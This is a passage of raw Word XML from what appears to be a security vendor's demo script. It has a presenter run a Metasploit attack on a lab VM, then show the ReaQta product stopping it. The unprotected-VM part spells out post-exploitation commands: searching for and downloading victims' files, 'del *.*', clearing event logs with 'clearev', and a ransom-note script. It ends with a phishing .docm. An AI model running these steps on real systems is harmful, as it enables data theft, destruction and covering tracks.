        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FCF391" w14:textId="77777777" w:rsidR="00DE7970" w:rsidRDefault="00DE7970" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="652CB7BE" w14:textId="2839D773" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Search for high value files with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F91D6DA" w14:textId="7E58B45F" w:rsidR="004C0ABE" w:rsidRDefault="00DD7F1A" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -d "c:\u</w:t>
      </w:r>
      <w:r w:rsidR="00FA40EE" w:rsidRPr="00FA40EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sers" -f *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FA40EE" w:rsidRPr="00FA40EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>xlsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="535FC227" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="7ACC2326" w14:textId="7899875E" w:rsidR="008A6790" w:rsidRDefault="008A6790" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Change directory to the direct</w:t>
      </w:r>
      <w:r w:rsidR="00DD7F1A">
        <w:t>ory containing high value files, using tab to autocomplete</w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve"> as you go</w:t>
      </w:r>
      <w:r w:rsidR="00DD7F1A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EC5971" w14:textId="0A13C15D" w:rsidR="004C0ABE" w:rsidRDefault="008A6790" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6790">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A6790">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008A6790">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>:\users\</w:t>
      </w:r>
      <w:r w:rsidR="00D53F1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidRPr="008A6790">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\CompanyFiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF0EA1" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2FFB6C" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r w:rsidRPr="001356D9">
        <w:t>Download the files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by typing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CD40FD" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106568E1" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="4A43132F" w14:textId="5B2E0C1C" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r w:rsidRPr="001356D9">
        <w:t>Now go into shell by typing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 'shell'</w:t>
      </w:r>
      <w:r w:rsidRPr="001356D9">
        <w:t xml:space="preserve"> and run </w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve">(and confirm when prompted) </w:t>
      </w:r>
      <w:r w:rsidRPr="001356D9">
        <w:t>the following command</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A43D3C9" w14:textId="7772A088" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>del</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> *.* </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EB2144" w14:textId="24BDF583" w:rsidR="0084610A" w:rsidRDefault="0084610A" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404CE053" w14:textId="7D821024" w:rsidR="00DD7F1A" w:rsidRDefault="00DD7F1A" w:rsidP="00DD7F1A">
      <w:r>
        <w:t xml:space="preserve">Show how the attacker is attempting to clear tracks by running this command. </w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve">All </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0035035A">
        <w:t>three event</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve"> logs are cleared, including the security log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6046B36E" w14:textId="77777777" w:rsidR="00DD7F1A" w:rsidRDefault="00DD7F1A" w:rsidP="00DD7F1A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>lea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00672BA8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ev</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5BAF0184" w14:textId="77777777" w:rsidR="00DD7F1A" w:rsidRDefault="00DD7F1A" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="37E02FDA" w14:textId="2687BC7D" w:rsidR="0084610A" w:rsidRDefault="00DD7F1A" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD7F1A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ctrl-Z</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to put Metasploit into the background. </w:t>
      </w:r>
      <w:r w:rsidR="00F217E1">
        <w:t xml:space="preserve">Now run the </w:t>
      </w:r>
      <w:r w:rsidR="00F217E1" w:rsidRPr="00F217E1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">send_ransom.sh </w:t>
      </w:r>
      <w:r w:rsidR="00F217E1">
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and ensure the victim screen is visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571CC2BD" w14:textId="77777777" w:rsidR="00F217E1" w:rsidRDefault="00F217E1" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECB4B4D" w14:textId="7C89204C" w:rsidR="00803A27" w:rsidRDefault="00803A27" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Show how the user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>can't</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dismiss the ransom demand and can't event shutdown the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252A9176" w14:textId="77777777" w:rsidR="00803A27" w:rsidRDefault="00803A27" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="6F695A60" w14:textId="77777777" w:rsidR="0035035A" w:rsidRDefault="009A7412" w:rsidP="004C0ABE">
      <w:r w:rsidRPr="009A7412">
        <w:t xml:space="preserve">Explain that this is the worst-case scenario. The attack has been successful, the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">high value </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7412">
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7412">
        <w:t xml:space="preserve"> stolen and the ransom demand delivered.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890C069" w14:textId="77777777" w:rsidR="0035035A" w:rsidRDefault="0035035A" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="774F9C53" w14:textId="6D642AE4" w:rsidR="0035035A" w:rsidRDefault="0035035A" w:rsidP="0035035A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>ReaQta Protected VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C67230" w14:textId="6B9CBEC6" w:rsidR="009A7412" w:rsidRPr="009A7412" w:rsidRDefault="009A7412" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Now </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>we're</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> going to run the same attack but this time on the ReaQta protected machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08025FF1" w14:textId="70700B14" w:rsidR="009A7412" w:rsidRDefault="009A7412" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF23A4C" w14:textId="394EDE82" w:rsidR="00803A27" w:rsidRDefault="00803A27" w:rsidP="009A7412">
      <w:r>
        <w:t xml:space="preserve">Place the ReaQta protected victim machine exactly where the previous </w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve">unprotected VM </w:t>
      </w:r>
      <w:r>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="0035035A">
        <w:t xml:space="preserve"> in the bottom right of the screen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, to the right of kali.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20207B87" w14:textId="77777777" w:rsidR="00803A27" w:rsidRDefault="00803A27" w:rsidP="009A7412"/>
    <w:p w14:paraId="3CE24007" w14:textId="76E93560" w:rsidR="0035035A" w:rsidRDefault="0035035A" w:rsidP="009A7412">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BB19ED4" w14:textId="3377B410" w:rsidR="0035035A" w:rsidRPr="0035035A" w:rsidRDefault="0035035A" w:rsidP="009A7412">
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidRPr="0035035A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the new ReaQta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proected</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> VM and then </w:t>
      </w:r>
      <w:r w:rsidR="0089109E">
        <w:t xml:space="preserve">type </w:t>
      </w:r>
      <w:r w:rsidRPr="0035035A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:r w:rsidR="0089109E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0089109E" w:rsidRPr="0089109E">
        <w:t>Note that the new VM has the following IP address:</w:t>
      </w:r>
      <w:r w:rsidR="0089109E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.57.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565DEED" w14:textId="77777777" w:rsidR="009A7412" w:rsidRPr="00672BA8" w:rsidRDefault="009A7412" w:rsidP="004C0ABE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F3BE360" w14:textId="77777777" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="0089109E">
      <w:r>
        <w:t>In Metasploit, select the new ReaQta protected target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EC16E" w14:textId="315318B9" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="0089109E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009A7412">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009A7412">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A7412">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7412">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>192.168.57.26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE84919" w14:textId="77777777" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="0089109E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076E3147" w14:textId="1D659742" w:rsidR="009A7412" w:rsidRDefault="009A7412" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Show that the configuration is</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t xml:space="preserve"> the same apart from the target and t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ype </w:t>
      </w:r>
      <w:r w:rsidRPr="009A7412">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:r>
        <w:t>to launch the attack</w:t>
      </w:r>
      <w:r w:rsidR="00803A27">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B91A21A" w14:textId="3FDAFB32" w:rsidR="009A7412" w:rsidRDefault="009A7412" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="4EE37F96" w14:textId="767900A3" w:rsidR="009A7412" w:rsidRDefault="009A7412" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Show how the attack starts to work but as soon as the process migration happens after the initial authentication, the attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is stopped</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in its tracks.</w:t>
      </w:r>
      <w:r w:rsidR="004E7B48">
        <w:t xml:space="preserve"> Explain that the hypervisor-level </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E7B48">
        <w:t>NanoOS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E7B48">
        <w:t xml:space="preserve"> ReaQta agent </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="004E7B48">
        <w:t>cannot be seen or killed from within the VM</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004E7B48">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08827AD8" w14:textId="77777777" w:rsidR="009A7412" w:rsidRDefault="009A7412" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="5CDD05D0" w14:textId="1DB139FC" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Now go to ReaQta and find the Cross Process alert. Drill into it and show how ReaQta caught the process injection (migration). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2634E251" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="5A02C302" w14:textId="5EAC983B" w:rsidR="009C298F" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Create a remediation plan. Because this is a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fileless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> attack, there are no files or registry settings to remove. Go </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>though</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> until </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>you're</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at the isolation screen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A530DF" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="55DB0A87" w14:textId="6430F0F3" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t xml:space="preserve">Before isolating, show that you can still </w:t>
      </w:r>
      <w:r w:rsidR="00146610">
        <w:t>ping the machine</w:t>
      </w:r>
      <w:r w:rsidR="006F5160">
        <w:t xml:space="preserve"> from kali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Now isolate </w:t>
      </w:r>
      <w:r w:rsidR="00DD7F1A">
        <w:t xml:space="preserve">the victim </w:t>
      </w:r>
      <w:r w:rsidR="00146610">
        <w:t xml:space="preserve">and show </w:t>
      </w:r>
      <w:r w:rsidR="00DD7F1A">
        <w:t xml:space="preserve">that the </w:t>
      </w:r>
      <w:r w:rsidR="0089109E">
        <w:t xml:space="preserve">ping failures </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prove that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00146610">
        <w:t>it's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00146610">
        <w:t xml:space="preserve"> off the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F39E22" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="4F2FB35C" w14:textId="1670D67A" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Show an</w:t>
      </w:r>
      <w:r w:rsidR="006F5160">
        <w:t xml:space="preserve">d explain the forensics options </w:t>
      </w:r>
      <w:r w:rsidR="0089109E">
        <w:t xml:space="preserve">within the Hive Console </w:t>
      </w:r>
      <w:r w:rsidR="006F5160">
        <w:t>and explain that the only connection is between the victim and this console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3C686" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="7400B3D9" w14:textId="26512F67" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Also</w:t>
      </w:r>
      <w:r w:rsidR="00817A4D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> show the ability to run any d</w:t>
      </w:r>
      <w:r w:rsidR="00146610">
        <w:t>esired commands on the endpoint, including network connections etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F90C96" w14:textId="77777777" w:rsidR="009C298F" w:rsidRDefault="009C298F" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="5A008D75" w14:textId="5A34DC32" w:rsidR="004C0ABE" w:rsidRDefault="006F5160" w:rsidP="004C0ABE">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Clearly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> there is now an urgent need to hunt the attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00146610">
        <w:t xml:space="preserve"> We also need to consider blocking the user from the network </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">until the password </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>has been reset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00146610">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F04EF2" w14:textId="1A54B915" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="3F4D16DF" w14:textId="670D88DE" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="004C0ABE">
      <w:r>
        <w:t>Conclude this stage of the attack by explaining the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D489DF2" w14:textId="181F0249" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="0089109E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We effectively disabled Defender (using exclusions) using remotely executed Powershell commands, which </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>were executed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r>
        <w:t>a stolen password hash</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B238BC" w14:textId="05EDC448" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="0089109E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By having the ReaQta agent installed, we stopped the attack in its tracks by detecting and preventing the attacker from using process migration to hide in a system process. The agent runs within the hypervisor </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>so cannot be seen or stopped by an attacker</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539BD23" w14:textId="7C12E34A" w:rsidR="0089109E" w:rsidRDefault="0089109E" w:rsidP="0089109E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>We were then able to isolate the machine and obtain all needed forensic data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FA4A2" w14:textId="77777777" w:rsidR="004C0ABE" w:rsidRDefault="004C0ABE" w:rsidP="004C0ABE"/>
    <w:p w14:paraId="65B0332D" w14:textId="1A7AFD0E" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc101267849"/>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Left of</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0ABE">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0ABE">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>oom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="33A840E8" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRPr="004C0ABE" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidRPr="004C0ABE">
        <w:t>se ReaQta to prevent phishing attacks, including ransomware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CECBE9" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10719C5D" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRPr="006373AA" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r w:rsidRPr="006373AA">
        <w:t>Use the VM with the ReaQta agent installed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in full screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718852C8" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DCA8F0" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRPr="001E7CB8" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc101267850"/>
      <w:r>
        <w:t>A Malware E</w:t>
      </w:r>
      <w:r w:rsidRPr="001E7CB8">
        <w:t>xecutable Drop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4D49B06A" w14:textId="2E89F332" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:r>
        <w:t xml:space="preserve">Open this file from </w:t>
      </w:r>
      <w:r w:rsidR="002716BE">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> phishing email</w:t>
      </w:r>
      <w:r w:rsidR="002716BE">
        <w:t xml:space="preserve"> in Outlook Express</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F01B950" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00093FEC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msf_embedded_exe.docm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202EEDA2" w14:textId="77777777" w:rsidR="00DD0105" w:rsidRPr="00093FEC" w:rsidRDefault="00DD0105" w:rsidP="00DD0105">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
